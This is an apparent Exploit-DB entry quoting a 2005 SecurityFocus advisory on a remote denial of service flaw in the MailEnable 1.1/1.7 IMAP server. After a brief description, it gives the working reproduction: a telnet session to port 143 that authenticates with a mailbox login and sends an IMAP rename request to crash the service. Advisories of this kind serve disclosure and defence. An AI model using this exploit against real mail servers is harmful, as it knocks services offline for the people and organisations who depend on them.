MailEnable 1.1/1.7 - IMAP Rename Request Remote Denial of Service

EDB-ID:

26575




Platform:

Windows

Date:

2005-11-23


source: https://www.securityfocus.com/bid/15556/info

MailEnable is prone to a remote denial of service vulnerability.

The vulnerability presents itself when a user issues a malicious rename request following authentication.

Remote attackers can exploit this issue to trigger a denial of service condition. 

telnet localhost 143
a1 login josh byebye
a2 rename foo bar

where josh and byebye are the login credentials for an existing mailbox.